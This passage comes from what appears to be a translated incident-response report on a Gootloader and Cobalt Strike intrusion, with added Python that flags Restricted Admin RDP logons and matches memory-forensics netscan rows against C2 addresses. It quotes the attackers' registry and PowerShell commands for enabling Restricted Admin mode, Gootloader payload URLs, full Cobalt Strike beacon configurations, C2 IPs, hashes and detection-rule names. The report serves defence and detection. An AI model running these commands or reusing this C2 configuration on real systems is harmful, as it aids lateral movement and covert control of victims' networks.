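# Constructed 4624 EventData records (not from the intrusion). LogonType 10 is
# RemoteInteractive (RDP); RestrictedAdminMode is "Yes" only when the session
# was authenticated in Restricted Admin mode, "No" for ordinary RDP, "-" otherwise.
SAMPLE_4624: List[Dict[str, str]] = [
    {'TargetUserName': 'da_admin', 'TargetDomainName': 'CORP', 'LogonType': '10',
     'RestrictedAdminMode': 'Yes', 'IpAddress': '10.0.0.25', 'WorkstationName': 'WS01'},
    {'TargetUserName': 'jdoe', 'TargetDomainName': 'CORP', 'LogonType': '10',
     'RestrictedAdminMode': 'No', 'IpAddress': '10.0.0.40', 'WorkstationName': 'WS07'},
    {'TargetUserName': 'svc_backup', 'TargetDomainName': 'CORP', 'LogonType': '3',
     'RestrictedAdminMode': '-', 'IpAddress': '10.0.0.9', 'WorkstationName': 'BK01'},
]


def restricted_admin_logons(events: List[Dict[str, str]]) -> List[Tuple[str, str, str]]:
    """Return (DOMAIN\\user, source IP, source workstation) for every RDP logon
    that used Restricted Admin mode."""
    hits = []
    for e in events:
        if e.get('LogonType') == '10' and e.get('RestrictedAdminMode') == 'Yes':
            account = f"{e.get('TargetDomainName', '')}\\{e.get('TargetUserName', '')}"
            hits.append((account, e.get('IpAddress', '-'), e.get('WorkstationName', '-')))
    return hits


if __name__ == '__main__':
    # The two command lines from the report, with the redactions left in place.
    print(enables_restricted_admin(
        'reg add "hklm\\system\\currentcontrolset\\control\\lsa" /f /v DisableRestrictedAdmin /t REG_DWORD /d 0'))
    print(enables_restricted_admin(
        "powershell.exe New-ItemProperty -Path 'HKLM:\\System\\CurrentControlSet\\Control\\Lsa' "
        "-Name 'DisableRestrictedAdmin' -Value 0 -PropertyType DWORD"))
    print(restricted_admin_logons(SAMPLE_4624))
```

In an environment that does not use Restricted Admin mode deliberately, any "Yes" in that field is worth an alert on its own; where it is used, the source IP and workstation returned here are what to compare against the hosts that are supposed to originate such sessions. Note that the registry check keys on the value 0, since 1 is the setting that turns the mode off again.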

08
Collection

The attackers accessed sensitive files on multiple servers through RDP sessions, for example by opening the files directly on the system.

Analysis of the registry ShellBags shows records of the attackers accessing multiple file shares.

09
Command and Control

Gootloader

The URLs from which Gootloader downloads its payload can be decoded with the script provided by the HP Threat Research team:

hxxps://kakiosk.adsparkdev[.]com/test.php?hjkiofilihyl=
hxxps://jp.imonitorsoft[.]com/test.php?hjkiofilihyl=
hxxps://junk-bros[.]com/test.php?hjkiofilihyl=

During the intrusion Gootloader called out to 35.206.117.64:443 (kakiosk[.]adsparkdev[.]com).

Ja3: a0e9f5d64349fb13191bc781f81f42e1
Ja3s: 567bb420d39046dbfd1f68b558d86382
Certificate: [d8:85:d1:48:a2:99:f5:ee:9d:a4:3e:01:1c:b0:ec:12:e5:23:7d:61]
Not Before: 2022/01/05 09:25:33 UTC
Not After: 2022/04/05 09:25:32 UTC
Issuer Org: Let's Encrypt
Subject Common: kakiosk.adsparkdev.com [kakiosk.adsparkdev.com, www.kakiosk.adsparkdev.com]
Public Algorithm: rsaEncryption

Cobalt Strike

146.70.78.43

Cobalt Strike server TLS configuration

146.70.78.43
Ja3: 72a589da586844d7f0818ce684948eea
Ja3s: f176ba63b4d68e576b5ba345bec2c7b7
Serial Number: 146473198 (0x8bb00ee)
Certificate: 73:6B:5E:DB:CF:C9:19:1D:5B:D0:1F:8C:E3:AB:56:38:18:9F:02:4F
Not Before: May 20 18:26:24 2015 GMT
Not After: May 17 18:26:24 2025 GMT
Issuer: C=, ST=, L=, O=, OU=, CN=
Subject: C=, ST=, L=, O=, OU=, CN=
Public Algorithm: rsaEncryption

Cobalt Strike Beacon configuration

Cobalt Strike Beacon:
  x86:
    beacon_type: HTTPS
    dns-beacon.strategy_fail_seconds: -1
    dns-beacon.strategy_fail_x: -1
    dns-beacon.strategy_rotate_seconds: -1
    http-get.client:
      Cookie
    http-get.uri: 146.70.78.43,/visit.js
    http-get.verb: GET
    http-post.client:
      Content-Type: application/octet-stream
      id
    http-post.uri: /submit.php
    http-post.verb: POST
    maxgetsize: 1048576
    port: 443
    post-ex.spawnto_x64: %windir%\sysnative\rundll32.exe
    post-ex.spawnto_x86: %windir%\syswow64\rundll32.exe
    process-inject.execute:
      CreateThread
      SetThreadContext
      CreateRemoteThread
      RtlCreateUserThread
    process-inject.startrwx: 64
    process-inject.stub: 222b8f27dbdfba8ddd559eeca27ea648
    process-inject.userwx: 64
    proxy.behavior: 2 (Use IE settings)
    server.publickey_md5: defb5d95ce99e1ebbf421a1a38d9cb64
    sleeptime: 60000
    useragent_header: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; yie9)
    uses_cookies: 1
    watermark: 1580103824
  x64:
    beacon_type: HTTPS
    dns-beacon.strategy_fail_seconds: -1
    dns-beacon.strategy_fail_x: -1
    dns-beacon.strategy_rotate_seconds: -1
    http-get.client:
      Cookie
    http-get.uri: 146.70.78.43,/fwlink
    http-get.verb: GET
    http-post.client:
      Content-Type: application/octet-stream
      id
    http-post.uri: /submit.php
    http-post.verb: POST
    maxgetsize: 1048576
    port: 443
    post-ex.spawnto_x64: %windir%\sysnative\rundll32.exe
    post-ex.spawnto_x86: %windir%\syswow64\rundll32.exe
    process-inject.execute:
      CreateThread
      SetThreadContext
      CreateRemoteThread
      RtlCreateUserThread
    process-inject.startrwx: 64
    process-inject.stub: 222b8f27dbdfba8ddd559eeca27ea648
    process-inject.userwx: 64
    proxy.behavior: 2 (Use IE settings)
    server.publickey_md5: defb5d95ce99e1ebbf421a1a38d9cb64
    sleeptime: 60000
    useragent_header: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENXA)
    uses_cookies: 1
    watermark: 1580103824

37.120.198.225

Cobalt Strike server TLS configuration

Ja3: 72a589da586844d7f0818ce684948eea
Ja3s: f176ba63b4d68e576b5ba345bec2c7b7
Serial Number: 146473198 (0x8bb00ee)
Certificate: 73:6B:5E:DB:CF:C9:19:1D:5B:D0:1F:8C:E3:AB:56:38:18:9F:02:4F
Not Before: May 20 18:26:24 2015 GMT
Not After: May 17 18:26:24 2025 GMT
Issuer: C=, ST=, L=, O=, OU=, CN=
Subject: C=, ST=, L=, O=, OU=, CN=
Public Algorithm: rsaEncryption

Cobalt Strike Beacon configuration

Cobalt Strike Beacon:
  x86:
    beacon_type: HTTPS
    dns-beacon.strategy_fail_seconds: -1
    dns-beacon.strategy_fail_x: -1
    dns-beacon.strategy_rotate_seconds: -1
    http-get.client:
      Cookie
    http-get.uri: 37.120.198.225,/cm
    http-get.verb: GET
    http-post.client:
      Content-Type: application/octet-stream
      id
    http-post.uri: /submit.php
    http-post.verb: POST
    maxgetsize: 1048576
    port: 443
    post-ex.spawnto_x64: %windir%\sysnative\rundll32.exe
    post-ex.spawnto_x86: %windir%\syswow64\rundll32.exe
    process-inject.execute:
      CreateThread
      SetThreadContext
      CreateRemoteThread
      RtlCreateUserThread
    process-inject.startrwx: 64
    process-inject.stub: 222b8f27dbdfba8ddd559eeca27ea648
    process-inject.userwx: 64
    proxy.behavior: 2 (Use IE settings)
    server.publickey_md5: defb5d95ce99e1ebbf421a1a38d9cb64
    sleeptime: 60000
    useragent_header: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)
    uses_cookies: 1
    watermark: 1580103824
  x64:
    beacon_type: HTTPS
    dns-beacon.strategy_fail_seconds: -1
    dns-beacon.strategy_fail_x: -1
    dns-beacon.strategy_rotate_seconds: -1
    http-get.client:
      Cookie
    http-get.uri: 37.120.198.225,/ptj
    http-get.verb: GET
    http-post.client:
      Content-Type: application/octet-stream
      id
    http-post.uri: /submit.php
    http-post.verb: POST
    maxgetsize: 1048576
    port: 443
    post-ex.spawnto_x64: %windir%\sysnative\rundll32.exe
    post-ex.spawnto_x86: %windir%\syswow64\rundll32.exe
    process-inject.execute:
      CreateThread
      SetThreadContext
      CreateRemoteThread
      RtlCreateUserThread
    process-inject.startrwx: 64
    process-inject.stub: 222b8f27dbdfba8ddd559eeca27ea648
    process-inject.userwx: 64
    proxy.behavior: 2 (Use IE settings)
    server.publickey_md5: defb5d95ce99e1ebbf421a1a38d9cb64
    sleeptime: 60000
    useragent_header: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; FunWebProducts; IE0006_ver1;EN_GB)
    uses_cookies: 1
    watermark: 1580103824

Real Intelligence Threat Analytics (RITA) successfully detected the C2 traffic to this IP.

Volatility identified the Cobalt Strike C2 connections:

Volatility 3 Framework 2.0.0
Offset Proto LocalAddr LocalPort ForeignAddr ForeignPort State PID Owner Created
...
0x948431c46010 TCPv4 10.X.X.X 52670 146.70.78.43 443 CLOSE_WAIT 3420 rundll32.exe
0x948431e19010 TCPv4 10.X.X.X 63723 146.70.78.43 443 CLOSED 3420 rundll32.exe
0x9484337f18a0 TCPv4 10.X.X.X 52697 146.70.78.43 443 CLOSE_WAIT 3420 rundll32.exe
0x948435102050 TCPv4 10.X.X.X 52689 146.70.78.43 443 CLOSE_WAIT 3420 rundll32.exe
...
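The netscan output above is the kind of artefact that gets cross-referenced against an IoC list during memory triage: the foreign address matches the Cobalt Strike server, and the owning process (rundll32.exe, PID 3420) matches the post-ex.spawnto values in the beacon configuration. As an added example for this translation (not code from the original report), the parser below reads Volatility 3 netscan rows, joins them against the C2 addresses listed in this report's IoC section, and groups the hits per process. The sample text reuses the rows above (10.X.X.X is the report's own redaction) plus one constructed benign SMB row.

```python
import re
from typing import Dict, List, Set, Tuple

# C2 addresses from the IoC section of this report.
C2_IOCS: Set[str] = {'146.70.78.43', '37.120.198.225', '35.206.117.64'}

# Volatility 3 netscan TCP row:
#   Offset Proto LocalAddr LocalPort ForeignAddr ForeignPort State PID Owner [Created]
# UDP rows have an empty State column and are deliberately left unmatched.
NETSCAN_ROW = re.compile(
    r'^(?P<offset>0x[0-9a-fA-F]+)\s+(?P<proto>TCPv[46])\s+(?P<laddr>\S+)\s+(?P<lport>\d+)\s+'
    r'(?P<faddr>\S+)\s+(?P<fport>\d+)\s+(?P<state>[A-Z_]+)\s+(?P<pid>\d+)\s+(?P<owner>\S+)')

# Rows from the report plus one constructed benign SMB connection (last line).
SAMPLE_NETSCAN = """Volatility 3 Framework 2.0.0
Offset Proto LocalAddr LocalPort ForeignAddr ForeignPort State PID Owner Created
...
0x948431c46010 TCPv4 10.X.X.X 52670 146.70.78.43 443 CLOSE_WAIT 3420 rundll32.exe
0x948431e19010 TCPv4 10.X.X.X 63723 146.70.78.43 443 CLOSED 3420 rundll32.exe
0x9484337f18a0 TCPv4 10.X.X.X 52697 146.70.78.43 443 CLOSE_WAIT 3420 rundll32.exe
0x948435102050 TCPv4 10.X.X.X 52689 146.70.78.43 443 CLOSE_WAIT 3420 rundll32.exe
0x948435200010 TCPv4 10.X.X.X 49710 10.X.X.X 445 ESTABLISHED 4 System
...
"""


def parse_netscan(text: str) -> List[Dict[str, str]]:
    """Return one dict per parseable TCP row; headers, separators and UDP rows are skipped."""
    rows = []
    for line in text.splitlines():
        m = NETSCAN_ROW.match(line.strip())
        if m:
            rows.append(m.groupdict())
    return rows


def find_c2_connections(text: str, iocs: Set[str]) -> List[Dict[str, str]]:
    """Rows whose foreign address is a known C2 server."""
    return [row for row in parse_netscan(text) if row['faddr'] in iocs]


def connections_by_process(text: str, iocs: Set[str]) -> Dict[Tuple[int, str], int]:
    """Group C2 hits by (PID, owner) so the injected host process stands out."""
    counts: Dict[Tuple[int, str], int] = {}
    for row in find_c2_connections(text, iocs):
        key = (int(row['pid']), row['owner'])
        counts[key] = counts.get(key, 0) + 1
    return counts


if __name__ == '__main__':
    for row in find_c2_connections(SAMPLE_NETSCAN, C2_IOCS):
        print(row['pid'], row['owner'], row['faddr'], row['fport'], row['state'])
    print(connections_by_process(SAMPLE_NETSCAN, C2_IOCS))
```

With a live capture the text would come from `vol -f image.raw windows.netscan`, and the resulting PID is the one to feed to `windows.malfind` to confirm the PAGE_EXECUTE_READWRITE region with the MZ header mentioned in the Defense Evasion section.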
10
Impact

The attackers were evicted from the network in time, and no further impact occurred.

IoCs

Gootloader

https://kakiosk.adsparkdev[.]com

https://jp.imonitorsoft[.]com

https://junk-bros[.]com

35.206.117.64:443

Cobalt Strike

146.70.78.43:443

37.120.198.225:443

olympus_plea_agreement 34603 .js

d7d3e1c76d5e2fa9f7253c8ababd6349

724013ea6906a3122698fd125f55546eac0c1fe0

6e141779a4695a637682d64f7bc09973bb82cd24211b2020c8c1648cdb41001b

olympus plea agreement(46196).zip

b50333ff4e5cbcda8b88ce109e882eeb

44589fc2a4d1379bee93282bbdb16acbaf762a45

7d93b3531f5ab7ef8d68fb3d06f57e889143654de4ba661e5975dae9679bbb2c

mi.ps1

acef25c1f6a7da349e62b365c05ae60c

c5d134a96ca4d33e96fb0ab68cf3139a95cf8071

d00edf5b9a9a23d3f891afd51260b3356214655a73e1a361701cda161798ea0b

Invoke-WMIExec.ps1

b4626a335789e457ea48e56dfbf39710

62a7656d81789591358796100390799e83428519

c4939f6ad41d4f83b427db797aaca106b865b6356b1db3b7c63b995085457222

ls.exe

87ae2a50ba94f45da39ec7673d71547c

dfa0b4206abede8f441fcdc8155803b8967e035c

8764131983eac23033c460833de5e439a4c475ad94cfd561d80cb62f86ff50a4

Suricata rules

ET HUNTING Suspicious Empty SSL Certificate - Observed in Cobalt Strike 

ET MALWARE Meterpreter or Other Reverse Shell SSL Cert

sigma

Custom Sigma rules

Deleting Windows Defender scheduled tasks

Enabling restricted admin mode

Using powershell specific download cradle OneLiner

Using Lazagne to dump credentials

Sigma repo rules

Bloodhound Detection – https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/proc_creation_win_hack_bloodhound.yml
Powershell download –
https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/proc_creation_win_powershell_download_patterns.yml
Defender Disable via Powershell –
https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/proc_creation_win_powershell_defender_disable_feature.yml
Creation of Scheduled Task via Powershell –
https://github.com/SigmaHQ/sigma/blob/master/rules/windows/powershell/powershell_script/posh_ps_cmdlet_scheduled_task.yml
LaZagne LSASS Access –
https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_access/proc_access_win_lazagne_cred_dump_lsass_access.yml
Systeminfo Discovery –
https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/proc_creation_win_susp_systeminfo.yml
CobaltStrike Named Pipe –
https://github.com/SigmaHQ/sigma/blob/7fb8272f948cc0b528fe7bd36df36449f74b2266/rules/windows/pipe_created/pipe_created_mal_cobaltstrike.yml
Malicious PowerShell Commandlets –
https://github.com/SigmaHQ/sigma/blob/becf3baeb4f6313bf267f7e8d6e9808fc0fc059c/rules/windows/powershell/powershell_script/posh_ps_malicious_commandlets.yml
Suspicious Service Installation –
https://github.com/SigmaHQ/sigma/blob/7d48d0e838b76f3fb5bc623e7ec45343cfac9c88/rules/windows/builtin/system/win_susp_service_installation.yml
Suspicious XOR Encoded PowerShell Command Line –
https://github.com/SigmaHQ/sigma/blob/becf3baeb4f6313bf267f7e8d6e9808fc0fc059c/rules/windows/powershell/powershell_classic/posh_pc_xor_commandline.yml
Too Long PowerShell Commandlines –
https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/proc_creation_win_long_powershell_commandline.yml
PowerShell Network Connections –
https://github.com/SigmaHQ/sigma/blob/master/rules/windows/network_connection/net_connection_win_powershell_network_connection.yml
Rundll32 Internet Connection –
https://github.com/SigmaHQ/sigma/blob/master/rules/windows/network_connection/net_connection_win_rundll32_net_connections.yml
Mimikatz Use –
https://github.com/SigmaHQ/sigma/blob/master/rules/windows/builtin/win_alert_mimikatz_keywords.yml

Yara

Custom Yara rule

References

https://news.sophos.com/en-us/2021/03/01/gootloader-expands-its-payload-delivery-options/


https://www.sentinelone.com/labs/gootloader-initial-access-as-a-service-platform-expands-its-search-for-high-value-targets/

https://redcanary.com/threat-detection-report/threats/gootkit/

https://news.sophos.com/en-us/2021/08/12/gootloaders-mothership-controls-malicious-content/

https://twitter.com/GootLoaderSites

https://github.com/AlessandroZ/LaZagne

https://github.com/The-DFIR-Report/cyberchef-recipes/blob/main/SEO%20Poisoning%20-%20A%20GootLoader%20Story

https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/attack-surface-reduction-rules-reference?view=o365-worldwide#block-javascript-or-vbscript-from-launching-downloaded-executable-content

https://github.com/Kevin-Robertson/Invoke-TheHash/blob/master/Invoke-WMIExec.ps1


https://twitter.com/HPSecurity

https://github.com/hpthreatresearch/tools/blob/main/gootloader/decode.py


Source: http://mp.weixin.qq.com/s?__biz=MzkzMDE3ODc1Mw==&mid=2247486271&idx=1&sn=8bd0c7510ae4041f6fa5cc7bc93e5c18&chksm=c27f7891f508f1875a5669fb101e3c5a4ab74c750e11dfd7b81c442686b8e1015f3351d4e285#rd